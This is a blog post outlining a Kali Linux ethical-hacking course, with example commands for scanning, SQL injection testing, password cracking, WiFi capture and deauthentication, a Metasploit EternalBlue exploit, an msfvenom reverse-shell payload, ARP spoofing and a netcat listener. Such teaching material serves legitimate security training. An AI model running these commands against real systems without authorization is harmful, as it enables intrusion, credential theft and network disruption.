Kali Linux Ethical Hacking Course Curriculum & Commands

 

🔥 Kali Linux Ethical Hacking Course Curriculum & Commands

This curriculum is designed for ethical hackers, cybersecurity enthusiasts, and penetration testers using Kali Linux. It covers reconnaissance, exploitation, wireless attacks, password cracking, and post-exploitation techniques.

📌 Module 1: Introduction to Kali Linux

🔹 Installation & Setup

  • Install Kali Linux (VirtualBox, VMware, Dual Boot)

  • Basic Linux commands (ls, cd, cp, mv, rm, nano)

  • File permissions & ownership (chmod, chown)

  • Package management (apt update && apt upgrade)

  • Network basics (ifconfig, ip a, netstat)

🔹 Useful Commands:

sh
whoami          # Check current user  
uname -a        # System information  
history         # View command history  
man <command>   # Get help for a command

🕵️‍♂️ Module 2: Information Gathering & OSINT

🔹 Passive & Active Reconnaissance

  • WHOIS Lookup (whois example.com)

  • DNS Enumeration (dig example.com, nslookup example.com)

  • Subdomain Discovery (sublist3r -d example.com)

  • Google Dorking (site:example.com filetype:pdf)

🔹 Scanning & Enumeration (Nmap, Netcat, Recon-ng)

sh
nmap -sS -p 1-65535 example.com   # Stealth scan all ports  
nmap -A -T4 example.com           # Aggressive scan (OS, services, versions)  
nc -v example.com 80              # Banner grabbing using Netcat

🌐 Module 3: Web Application Hacking

🔹 Web Vulnerability Scanning

  • nikto -h http://example.com → Scan for web vulnerabilities

  • gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt → Find hidden directories

  • sqlmap -u "http://example.com/page.php?id=1" --dbs → Test for SQL Injection

  • xsstrike -u "http://example.com/search?q=test" → Find XSS vulnerabilities

🔹 Burp Suite for Web Attacks

  • Intercepting HTTP requests

  • Session hijacking & cookie manipulation

  • Modifying parameters for SQLi/XSS

🔓 Module 4: Password Cracking & Brute Force Attacks

🔹 Using Hashcat for Password Cracking

sh
hashcat -m 0 -a 0 hash.txt rockyou.txt

🔹 John the Ripper

sh
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

🔹 Hydra (Brute Force Login)

sh
hydra -l admin -P rockyou.txt example.com ssh

📡 Module 5: Wireless Hacking

🔹 Monitor & Capture WiFi Networks

sh
airmon-ng start wlan0  
airodump-ng wlan0mon

🔹 Crack WPA2 Password

sh
aircrack-ng -a2 -b <BSSID> -w rockyou.txt capture.cap

🔹 Deauthenticate a WiFi Client

sh
aireplay-ng --deauth 100 -a <Router_BSSID> wlan0mon

💀 Module 6: Exploitation & Metasploit Framework

🔹 Start Metasploit

sh
msfconsole  
search exploit smb  
use exploit/windows/smb/ms17_010_eternalblue  
set RHOST 192.168.1.10  
exploit

🔹 Create Payload

sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

📶 Module 7: MITM Attacks & Sniffing

🔹 ARP Spoofing (Bettercap)

sh
bettercap -iface eth0  
net.probe on

🔹 Packet Sniffing

sh
tshark -i eth0

🛡️ Module 8: Anonymity & Privacy

🔹 Tor & Proxychains

sh
tor  
proxychains firefox

🔹 Change MAC Address

sh
macchanger -r eth0

🎯 Bonus: Bug Bounty & Penetration Testing

  • Reporting vulnerabilities

  • Bypassing firewalls & WAFs

  • Automating attacks with Python

Comments

Post a Comment

Popular posts from this blog

Kali Linux Commands for Ethical Hacking Tools

  🔥 Kali Linux Commands for Ethical Hacking Tools Here’s a complete list of Kali Linux tools and their commands, categorized by Reconnaissance, Scanning, Exploitation, Wireless Attacks, Password Cracking, and Post-Exploitation . 🕵️ 1. Reconnaissance (Information Gathering) WHOIS Lookup sh Copy Edit whois example.com Get domain information. DNS Enumeration sh Copy Edit dig example.com nslookup example.com host example.com Find subdomains & DNS records. Subdomain Discovery sh Copy Edit sublist3r -d example.com List subdomains of a target. Network Scanning (Nmap) sh Copy Edit nmap -sS -p 1-65535 example.com nmap -A -T4 example.com Scan open ports & services. Netcat (Banner Grabbing & Reverse Shell) sh Copy Edit nc -v example.com 80 nc -lvnp 4444 🌐 2. Web Application Security Nikto (Web Vulnerability Scanner) sh Copy Edit nikto -h http://example.com Scan for vulnerabilities. SQL Injection (SQLmap) sh Copy Edit sqlmap -u "http:/...
Read more

A business-level SSL certificate typically falls under Organization Validation (OV)

 A business-level SSL certificate typically falls under Organization Validation (OV) SSL or Extended Validation (EV) SSL . These certificates require businesses to undergo a verification process , ensuring they are legally registered and operating. Example of a Business-Level SSL Certificate (EV SSL) 🔹 Common Name (CN): paypal.com 🔹 Organization (O): PayPal, Inc. 🔹 Organizational Unit (OU): Security Department 🔹 Country (C): US 🔹 State (S): California 🔹 Locality (L): San Jose 🔹 Issuer: DigiCert Inc 🔹 Certificate Type: Extended Validation (EV) SSL 💡 How to Identify a Business-Level SSL Certificate: Check the Certificate Details: Click the padlock icon in the browser’s address bar. View "Certificate (Valid)" → "Details" . Look for the Organization (O) field —it should contain a real business name . Extended Validation (EV) SSL Indicators: Some browsers (e.g., older versions of Safari) highlight the company name in the...
Read more